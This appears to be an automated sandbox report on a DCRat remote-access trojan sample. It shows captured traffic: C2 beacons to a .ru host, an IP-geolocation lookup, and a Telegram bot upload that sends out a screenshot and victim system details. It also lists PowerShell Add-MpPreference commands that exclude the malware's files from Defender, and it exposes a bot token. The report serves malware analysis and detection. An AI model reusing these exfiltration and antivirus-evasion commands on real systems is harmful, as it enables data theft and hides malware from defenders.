Oct 24, 2024 13:59:13.443510056 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:59:13 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

Session ID	Source IP	Source Port	Destination IP	Destination Port
22	192.168.2.5	50000	92.53.106.114	80

Timestamp	Bytes transferred	Direction	Data
Oct 24, 2024 13:59:18.452212095 CEST	2183	OUT	GET /2b750b3c.php?BOimVJiSbQd8wpL0XV611LUdQZ=qOeuq0hdwOOBcu2OM9RBx&c4b18150f245d5284af5b56cab93221f=wY1QTYzMGO4gjNiRWMiBzYwEmNlRmYjJGMyIWMxYTZ0EWO1QjYxEmMwUzM2MjN4IDMzgTO0ADO&c3f24358aa290547facbfb1d35d51e12=gMiNDMycTOhNGOlFjZjdTZ4ITOmFzYjhTZlRTYwQGZjhTYlBjN4cDO&2e1f5dd3d70975cffed24acf3ee537e1=d1nIwYGZwEGOzEzM4IDOlVGZ0YTMhV2YzczMyMmM5QTN3UWM1YGNxYTZ5IiOiQzYhJmY2IzN4UTM4UWN4QjM3UzNhBjN1EmZllDMzYTZiwiIkVzM4Q2MzIjZ3IjMjJWZyQWN2YTNmZTZkFGM3Q2YhBTZwQDMiFDOjJiOiAjYyUmYiJ2MzkjZ0IWOzImM3IWO0czNwMmNkRmNwQWOis3W&4f95757b0d5ea400a0cf47cfe251d048=QX9JiI6IiYklTN4YTY5UGZ5MWZ3UjY0kTO5YzMlZWYjdTN3IWZ5ICLiAjZkBTY4MTMzgjM4UWZkRjNxEWZjNzNzIzYykDN1cTZxUjZ0EjNlljI6ICNjFmYiZjM3gTNxgTZ1gDNycTN3EGM2UTYmVWOwMjNlJCLiQWNzgDZzMjMmdjMyMmYlJDZ1YjN1YmNlRWYwcDZjFGMlBDNwIWM4MmI6ICMiJTZiJmYzMTOmRjY5MjYycjY5QzN3AzY2QGZ2ADZ5Iyes0nIRZWMvpWSwY1MixWMXFWVChlWshnMVl2dplkb1cVY3Z1VaNnTslkNJl3YxIFWZBjTWVGMs1GZwJ1MZJkSDxUaJhlWuZUbihWMFlEdG12YulTbjFlSp9UajNjYrVzVhhlUxElQKNETpRzaJZTSTJGaO1WWsRWMjBnSDxUarxWS2k0UaVXOHF2d502Yqx2VUpHbtl0cJN1S1R2MiVHdtJmVoNUS [TRUNCATED] Accept: / Content-Type: text/csv User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36 Host: cm36861.tw1.ru Connection: Keep-Alive
Oct 24, 2024 13:59:19.345777988 CEST	267	IN	HTTP/1.1 200 OK Server: nginx/1.26.1 Date: Thu, 24 Oct 2024 11:59:19 GMT Content-Type: text/html; charset=UTF-8 Content-Length: 104 Connection: keep-alive Data Raw: 3d 3d 51 66 39 4a 69 49 36 49 69 59 6a 46 6a 59 7a 63 6a 4e 31 45 32 59 6a 68 54 59 6d 6c 6a 5a 77 45 32 4d 31 51 32 4d 77 51 54 4d 68 46 54 5a 77 49 47 4e 35 49 79 65 36 49 43 5a 33 59 54 4e 68 52 6a 4d 77 49 32 4e 78 45 44 4d 79 51 57 59 6d 68 44 4e 68 52 54 5a 32 4d 47 4e 69 4e 32 4d 6a 46 57 4d 7a 49 79 65 Data Ascii: ==Qf9JiI6IiYjFjYzcjN1E2YjhTYmljZwE2M1Q2MwQTMhFTZwIGN5Iye6ICZ3YTNhRjMwI2NxEDMyQWYmhDNhRTZ2MGNiN2MjFWMzIye

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49706	34.117.59.81	443	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 11:57:11 UTC	63	OUT	GET /json HTTP/1.1 Host: ipinfo.io Connection: Keep-Alive
2024-10-24 11:57:11 UTC	345	IN	HTTP/1.1 200 OK access-control-allow-origin: * Content-Length: 314 content-type: application/json; charset=utf-8 date: Thu, 24 Oct 2024 11:57:11 GMT x-content-type-options: nosniff via: 1.1 google strict-transport-security: max-age=2592000; includeSubDomains Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-10-24 11:57:11 UTC	314	IN	Data Raw: 7b 0a 20 20 22 69 70 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 22 2c 0a 20 20 22 68 6f 73 74 6e 61 6d 65 22 3a 20 22 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 2e 73 74 61 74 69 63 2e 71 75 61 64 72 61 6e 65 74 2e 63 6f 6d 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 44 61 6c 6c 61 73 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 54 65 78 61 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 22 6c 6f 63 22 3a 20 22 33 32 2e 38 31 35 32 2c 2d 39 36 2e 38 37 30 33 22 2c 0a 20 20 22 6f 72 67 22 3a 20 22 41 53 38 31 30 30 20 51 75 61 64 72 61 4e 65 74 20 45 6e 74 65 72 70 72 69 73 65 73 20 4c 4c 43 22 2c 0a 20 20 22 70 6f 73 74 61 6c 22 3a 20 22 37 35 32 34 37 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 Data Ascii: { "ip": "173.254.250.71", "hostname": "173.254.250.71.static.quadranet.com", "city": "Dallas", "region": "Texas", "country": "US", "loc": "32.8152,-96.8703", "org": "AS8100 QuadraNet Enterprises LLC", "postal": "75247", "timezone": "Amer

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49708	149.154.167.220	443	7064	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 11:57:12 UTC	723	OUT	POST /bot7362674374:AAHc4bvqtak0iH1wK9oJ4m5BCQ5eSxckDy4/sendPhoto?chat_id=https://t.me/vavaaffBOT&caption=%E2%9D%95%20User%20connected%20%E2%9D%95%0A%E2%80%A2%20ID%3A%20c81b040e0acd70ade6f5665d2ebc227f233d835d%0A%E2%80%A2%20Comment%3A%20%0A%0A%E2%80%A2%20User%20Name%3A%20user%0A%E2%80%A2%20PC%20Name%3A%20040965%0A%E2%80%A2%20OS%20Info%3A%20Windows%2010%20Pro%0A%0A%E2%80%A2%20IP%3A%20173.254.250.71%0A%E2%80%A2%20GEO%3A%20US%20%2F%20Dallas%0A%0A%E2%80%A2%20Working%20Directory%3A%20C%3A%5CRecovery%5CdLErkomWRcaRguaKAMtYMnt.exe HTTP/1.1 Content-Type: multipart/form-data; boundary=------------------------8dcf417d74c5912 Host: api.telegram.org Content-Length: 669245 Expect: 100-continue Connection: Keep-Alive
2024-10-24 11:57:13 UTC	25	IN	HTTP/1.1 100 Continue
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 66 34 31 37 64 37 34 63 35 39 31 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 68 6f 74 6f 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 73 63 72 65 65 6e 73 68 6f 74 2e 70 6e 67 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 6d 75 6c 74 69 70 61 72 74 2f 66 6f 72 6d 2d 64 61 74 61 0d 0a 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 05 00 00 00 04 00 08 06 00 00 00 be 93 f4 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 09 70 48 59 73 00 00 0e c3 00 00 0e c3 01 c7 6f a8 64 00 00 ff a5 49 44 41 54 78 5e ec fd 07 94 ac 47 99 a6 8b Data Ascii: --------------------------8dcf417d74c5912Content-Disposition: form-data; name="photo"; filename="screenshot.png"Content-Type: multipart/form-dataPNGIHDRCsRGBgAMAapHYsodIDATx^G
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: ba ef 4e 74 0e 12 a7 b6 17 43 f4 f1 22 10 ef fa 63 04 3d 1b 50 71 ea 18 79 56 a0 64 a1 3a 06 81 bc 60 4d 5e cf ff 53 07 e0 b2 1d 63 5a 21 d8 08 3a 24 5b 91 71 39 ae 2b bf 08 3e 49 3e c5 18 89 21 08 d9 2f 01 a8 73 bd 8b 8f b9 3a f4 80 f9 9a 5d 79 e1 48 3e ab 91 80 ca a9 de f7 03 75 aa 57 8e 51 2f 11 e1 0c 3f 8b 6b bd 83 84 9d 04 1d b2 0f e9 86 8c 23 c6 1e 62 ec 93 c0 23 2e 49 a7 7d aa 57 4e 73 c7 f7 e8 b3 15 63 ce 19 7c 8e be 27 71 7d 7e f9 ec 06 09 3b 46 c5 56 72 4e 8e 69 94 d0 63 ad 7a d5 0a e2 7e 06 73 5d f7 55 4c 73 ce 42 d0 81 e4 9b 84 1e 6b c4 9c 62 92 74 cc 55 2b 01 c8 ba 3e 87 7a 40 dc b1 f6 bd a2 fe 5c c5 b5 97 3c fb f9 1c d5 11 67 4e ac bc 2d b8 91 75 c8 38 3a 01 e9 fc 93 d0 03 5d ed 2d b2 2e 23 a9 a7 b8 46 d5 03 35 c2 f7 32 97 08 14 2e f6 90 7a Data Ascii: NtC"c=PqyVd:`M^ScZ!:$[q9+>I>!/s:]yH>uWQ/?k#b#.I}WNsc\|'q}~;FVrNicz~s]ULsBkbtU+>z@\<gN-u8:]-.#F52.z
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: a9 5e 7b 85 62 d4 a8 2e 12 7e aa f7 3a e5 10 7f c0 b5 df ee 4b ce 2c 73 75 04 32 47 ee 21 00 19 79 23 b0 9e f1 a7 0e 40 c9 c0 22 fb 38 93 cf e1 7b 37 39 84 9f 40 e8 21 f6 04 b2 4f 90 a3 86 b9 72 ac 17 2c 00 bd f3 cf e3 9f fc e1 ba 74 fe 05 17 a6 cb ae b8 2a 14 7c a3 18 26 00 1d 97 81 ff c7 37 f2 7f 60 1d 3f f3 d6 df 41 6f fe 75 5c e8 0d 43 42 2c 8a 0d c3 eb 23 8e 58 7b 5e 23 00 eb ee bf c3 33 9f 4a bf bf ef ab a1 8c aa a9 05 e0 0d 37 dc b0 5e 04 60 74 ed d7 89 64 de 7c 58 12 80 fd 82 8e f9 d2 15 e0 f1 78 be 09 c0 0e 02 ae 8a 8d 4b 24 ff 9c 50 fa 39 81 f4 73 5c f2 0d 63 96 98 1b 10 9f 34 eb 5b 00 ae 6f 09 18 c9 3f d8 18 05 20 44 92 6f 18 91 f4 73 6a a1 57 b3 3e 05 20 44 92 6f 18 1b 5a 00 d6 b1 9a 25 01 b8 40 02 f9 07 91 ec 8b d8 98 04 60 2d f9 6a a2 3a 89 Data Ascii: ^{b.~:K,su2G!y#@"8{79@!Or,t*\|&7`?Aou\CB,#X{^#3J7^`td\|XxK$P9s\c4[o? DosjW> DoZ%@`-j:
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: 0d 8a 4f 9a 48 fa 39 91 f4 73 22 89 b7 10 22 89 b7 10 22 e9 e7 44 52 6f 1c 22 a9 37 0e 91 e4 1b c6 2c 81 b7 50 22 a9 37 0e 81 f0 1b 44 24 f0 16 4a 24 fd 9c 48 e4 2d 84 25 01 38 9c e7 9e 00 ec a7 fb e1 7b c6 62 2e d2 cf 59 88 00 84 d9 02 70 81 04 52 6f 1c 10 80 a2 74 e2 8d 8b c9 bc 88 41 42 51 f9 5a 00 76 de 71 5b 21 92 7e 4e 24 00 bb 6f bb 79 16 91 d4 1b 87 48 fa 39 91 e4 73 ea 2b c4 93 10 80 11 91 dc ab 3b ff 14 73 90 7c f5 15 61 70 01 38 97 2e c0 28 0f 2e fc bc 56 73 ae fc 8a f6 3a 6f 43 11 7c 55 cd 2c 46 08 40 c9 bf ce 2b af ee 93 80 9a 23 f9 24 01 25 ff 40 02 50 52 70 10 48 3c c9 3b e4 9f 5f 27 ee 13 7a 4d 5e 73 49 c0 41 c2 10 c1 87 f4 43 00 22 fa 24 01 c1 05 20 42 cf a5 1f 72 4f 82 0f 3a 7b 5f 56 3a fe 4a b7 5f ae 5d 71 60 fe 7e 79 4e 3d 71 3d f7 4f Data Ascii: OH9s"""DRo"7,P"7D$J$H-%8{b.YpRotABQZvq[!~N$oyH9s+;s\|ap8.(.Vs:oC\|U,F@+#$%@PRpH<;_'zM^sIAC"$ BrO:{_V:J_]q`~yN=q=O
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: 3b 63 ee a9 10 a4 65 6c 8e c2 71 94 7c 43 9b ad 57 e4 29 fb 90 78 de fa 0b c4 89 29 f7 cc 01 e6 c8 e1 36 61 41 08 ba 86 b1 c2 ec f0 49 9f 1a bf 05 48 cb 58 19 47 5f 01 07 8e 91 71 e6 44 01 27 e4 32 4f 4b 6e cc 37 ee 7e 10 c7 bc 83 cf a0 b5 1f f3 d9 c3 18 d8 27 ee dc 2c 89 47 1c 11 28 f1 66 5f 69 c7 11 f7 da 7b 01 b8 1d 8e 53 01 98 cd 67 52 6f 15 ea de 2b 54 ec a5 ef b0 02 d9 9e 3b 63 fb c7 87 61 55 e1 d7 a2 00 54 02 ca 58 0d f8 c1 07 bb 03 1f ea 46 18 af 5d 71 7f 59 db cb c0 2d df 0e 5c b1 12 50 e9 87 08 94 28 01 ab 84 2b ed 94 f4 3b ef f6 5d 15 80 51 f8 b5 44 41 b7 d7 64 82 6f 11 ad 00 6c c9 24 dd f1 c0 5e 09 c0 79 ec 54 00 2e 43 26 f9 e6 91 49 bf 88 a2 6f 56 7c 11 51 00 3e 94 22 50 76 5b 00 ce 22 93 7d 19 ad 00 5c 86 4c f4 cd 42 01 b8 17 22 10 32 c9 b7 Data Ascii: ;celq\|CW)x)6aAIHXG_qD'2OKn7~',G(f_i{SgRo+T;caUTXF]qY-\P(+;]QDAdol$^yT.C&IoV\|Q>"Pv["}\LB"2
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: e0 07 ef ef 36 0a 07 ae 3c 5a fe ac ef 2d 7f a6 e5 67 47 80 22 1b eb f7 03 cb ff 56 40 f3 ed 40 51 04 b6 28 eb 66 71 e0 dc 9e 4c 9a c1 94 e4 2b 64 12 11 da 3c f0 fb 80 2d b5 a2 31 b4 c7 82 c9 d9 b7 cc 64 91 dc 5b 06 8f 08 6f 97 4c fa ad 42 26 05 57 21 93 7e 91 ad 42 af a5 bc c7 2e b1 dd 23 c2 73 79 d7 0f e6 b2 17 c2 70 f2 ce ad a2 6f b7 98 bc fd e6 29 32 e9 17 59 7f 7b 59 d7 c4 32 11 38 93 3f f8 5e b7 f6 fb b3 59 5f 91 b5 b7 7c 77 9a 37 4f 0b c1 55 d9 f8 bd ef cf 65 fd 4d e5 77 50 d8 58 82 f5 37 de b4 85 b5 df 2d ef 5d da 2c b7 9f eb 45 e0 76 51 00 2e 0b f2 cf b6 25 3b 3a 6c 05 e0 76 99 27 f1 76 2a 09 01 01 b8 88 f5 5f fb d6 16 d6 7e f5 ef 2a 99 14 8c ac 21 e8 90 7e 09 cc 2d 92 83 ed 7c 46 7d 46 81 23 c1 93 d7 7d 63 9a d7 7e bd b2 f6 9a 1c 25 61 36 07 51 Data Ascii: 6<Z-gG"V@@Q(fqL+d<-1d[oLB&W!~B.#sypo)2Y{Y28?^Y_\|w7OUeMwPX7-],EvQ.%;:lv'v_~!~-\|F}F#}c~%a6Q
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: d2 2f 92 49 b9 63 49 2a ff 00 91 d7 88 bd 55 79 28 04 e0 56 09 98 0b bb dd c2 6f 01 66 32 0f 1e e9 02 10 32 f1 27 fb 02 70 9a 4c f6 65 1c 2b 01 98 a1 fc 5b 46 00 4a 2b fe a4 95 7b 2d 59 ce 6e 0b c0 58 f1 17 05 60 5c db ca 3f 51 ee cd 12 80 31 16 05 a0 22 af 15 80 ad 04 64 ac dc ab fd 61 9d 02 90 aa bf 65 05 20 2d 47 7f 0f 51 6d 18 8e 01 cf 43 d1 27 b1 62 10 94 7f 0a 40 51 00 72 fc 97 16 e9 47 3c 5e 00 52 fb 67 6d 1e fb 05 a5 9f 55 7e f4 39 f6 8b f0 33 c7 31 df 0b 6c e5 1f 97 82 c0 a1 b3 7a 14 7f 51 00 52 01 e8 37 01 91 78 10 bf 01 a8 c8 ab 15 7c cd 78 14 7b 83 1c 8c 95 81 51 00 9a ef 65 1f b3 04 20 15 80 0a 3d 05 60 15 7b c3 85 20 56 fe 21 ff 8c 79 1c 98 18 32 0f c9 17 ab fb 94 7f e0 91 df 56 0e 2a 06 a3 c8 f3 5b 7f 51 00 5a dd a7 b4 63 ac c8 63 9d 92 50 Data Ascii: /IcIUy(Vof22'pLe+[FJ+{-YnX`\?Q1"dae -GQmC'b@QrG<^RgmU~931lzQR7x\|x{Qe =`{ V!y2V[QZccP
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: 17 82 1c 13 d6 11 e1 22 05 bb 17 ff 5d 9a be d8 e6 24 01 cf ef 49 bf ee f9 36 5f 08 a5 dd 24 09 a4 9f 27 94 7e 9e 40 ba f5 13 49 bd 71 88 f6 1c 9d 48 ea 8d 83 17 7d 83 58 15 80 f6 b9 cb 24 00 97 4a 24 ff 20 92 7d 11 cf 25 01 18 0a bc a5 12 c8 bc 71 88 44 9f a7 96 7e 35 12 80 a3 8a c0 71 05 20 b7 00 d7 37 01 7b 34 e7 65 9f f0 f1 50 fe 19 e3 be f7 6f 98 00 8c 24 a0 8e fb d2 f7 39 b5 00 54 25 60 2d 00 23 b1 17 c5 22 72 4e 91 7b 3a 02 ec 05 9f 17 81 0b 09 c0 41 82 4f 63 c5 16 42 e2 af a5 12 7f 42 95 80 aa 0c 44 06 d2 22 04 bb c7 dd 91 85 9d 97 7a 12 80 12 7a f4 41 37 06 4b f2 49 fc 51 e9 07 7e 4e 31 e6 b5 9f 62 48 3f aa 01 e7 55 04 16 91 27 e1 c7 7b 01 55 f5 07 5e f6 81 17 81 88 42 1d f1 95 00 94 f4 a3 9d 3b d6 9e df e2 f5 1c a8 0a 50 d5 7a 3a aa ab 4a 3f 50 Data Ascii: "]$I6_$'~@IqH}X$J$ }%qD~5q 7{4ePo$9T%`-#"rN{:AOcBBD"zzA7KIQ~N1bH?U'{U^B;Pz:J?P
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: d1 7b 05 47 45 02 70 e6 fd 0f f5 89 bc c5 52 0b c0 90 11 05 a0 f2 23 69 37 49 bc f8 8b 64 5f 14 f3 2c 55 00 6a 0d 92 af 3d ee 5b c6 b3 36 b7 ab 0b c0 d9 80 99 b7 df db 82 e4 1b 86 84 dd 62 90 f0 93 e0 ab e7 10 7c 9a d3 b8 06 c9 a7 5b 80 bd f8 13 4b 15 80 b5 f0 93 10 54 5f 52 6f 10 e3 08 c0 48 02 22 eb 24 00 55 f5 e7 ab 01 bd 00 f4 79 92 7e 82 18 48 fc b1 2e cb c5 2a af 16 80 d0 1e 23 96 dc ab 84 5f 2d ff f2 6d c0 45 fc 65 d9 47 c5 df 31 77 f4 e4 9f c1 b1 5e 04 1c ef ff cb e3 72 63 30 63 ad cb 6b 9c ec 93 b4 f3 30 af 63 c0 cc 33 96 f8 ab e3 9a 93 00 64 ac 8a 3e 5a 64 20 02 b0 ad ee b3 b8 8e ff 22 04 f5 8e 40 e6 c9 cf 14 f9 37 88 75 b6 27 ad 64 9e 97 7d 1a 4b 08 aa f2 cf 8b 3f 21 e1 e7 91 e0 ab f1 73 c8 3d c6 fe 66 60 3f a7 be c6 62 98 fc 03 2e 00 f1 02 10 Data Ascii: {GEpR#i7Id_,Uj=[6b\|[KT_RoH"$Uy~H.*#_-mEeG1w^rc0ck0c3d>Zd "@7u'd}K?!s=f`?b.
2024-10-24 11:57:13 UTC	16355	OUT	Data Raw: 95 7f ad f8 33 74 1c 38 c7 8b dc 93 e8 93 f8 f3 68 ce 8b 3e f0 63 2f 02 25 00 95 d3 3d a6 79 f7 9f 2a ff 74 fc d7 e3 8f fb 4a 04 22 fa 5a c1 57 84 1f 31 e5 fa f9 d9 63 ee 68 2e 12 39 fa f6 34 7d 54 53 11 28 01 48 1f f9 87 18 94 24 d4 25 21 12 82 92 7f 12 72 b5 04 64 4e 02 4f 71 a4 9f 04 20 d0 47 ec 91 43 3e d5 80 ac 25 c6 bb 02 99 f7 7b d2 4a 08 4a d8 09 c6 c8 3b 09 41 2f 00 89 49 fe e9 1d 80 f4 6b 01 48 9e e2 08 3c 09 3b 89 3f 5a f0 97 86 30 4f ae cf a9 e5 a0 df 4b 73 54 f9 a9 d2 4f 52 cf 0b 41 5f ed 57 4b 40 40 e0 49 da 49 e0 21 ec 10 78 92 7f 12 7a b9 92 0f 79 67 71 bf 8e 7c aa fe 34 cf 9c 68 df 21 68 eb a1 96 79 12 80 c4 18 23 07 6b 01 a8 b1 d6 28 8f b1 97 73 aa e4 cb 95 79 d6 f7 31 55 f4 29 a6 31 73 ba 28 44 6b 40 a2 4f 47 80 75 ec 57 9f 27 54 bd 27 Data Ascii: 3t8h>c/%=y*tJ"ZW1ch.94}TS(H$%!rdNOq GC>%{JJ;A/IkH<;?Z0OKsTORA_WK@@II!xzygq\|4h!hy#k(sy1U)1s(Dk@OGuW'T'
2024-10-24 11:57:14 UTC	419	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Thu, 24 Oct 2024 11:57:14 GMT Content-Type: application/json Content-Length: 73 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":false,"error_code":400,"description":"Bad Request: chat not found"}

Target ID:	0
Start time:	07:56:57
Start date:	24/10/2024
Path:	C:\Users\user\Desktop\kQyd2z80gD.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\kQyd2z80gD.exe"
Imagebase:	0x2b0000
File size:	530'432 bytes
MD5 hash:	4A3BF58E23A86EA73D2F1D8BA04E7467
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000000.2044705339.00000000002B2000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.2124507684.00000000026D1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\kQyd2z80gD.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Default\dLErkomWRcaRguaKAMtYMnt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\WmiPrvSE.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	22
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\SearchApp.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	24
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	26
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe'
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Analysis Process: conhost.exePID: 5636, Parent PID: 2316

General

Target ID:	27
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	28
Start time:	07:57:03
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	29
Start time:	07:57:04
Start date:	24/10/2024
Path:	C:\Recovery\dLErkomWRcaRguaKAMtYMnt.exe
